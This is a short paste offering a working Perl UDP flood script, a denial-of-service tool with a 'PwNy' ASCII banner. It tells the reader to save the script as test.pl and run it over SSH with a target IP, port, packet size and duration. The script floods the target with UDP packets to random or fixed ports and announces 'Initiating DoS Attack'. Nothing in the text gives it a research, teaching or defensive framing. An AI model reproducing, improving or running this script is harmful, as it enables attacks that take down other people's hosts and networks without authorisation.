create a test.pl file with as content:
#!/usr/bin/perl
##
# PwNy<----
##
use Socket;
use strict;
my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 100);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print <<EOTEXT;
PwNy
** ** **
/**////** /** /**////**
/** /** ** ** /** /** /** ** **
/** **///**//**//* /** /** /** **////** **////
/**//// /** /** / /** /** /**/** /**//**
/** /**//// /** /** /** ** /** /** //**
/** //**/*** *** /** //** **
// // /// /// // // //
EOTEXT
print "Initiating DoS Attack on $ip " . ($port ? $port : "random") . " we're hitting that port with " .
($size ? "$size-byte" : "...-_-...") . " Packets Per Second. " .
($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
Command to run in SSH: perl test.pl {IP} {PORT} {SIZE (50 recommend)} {TIME}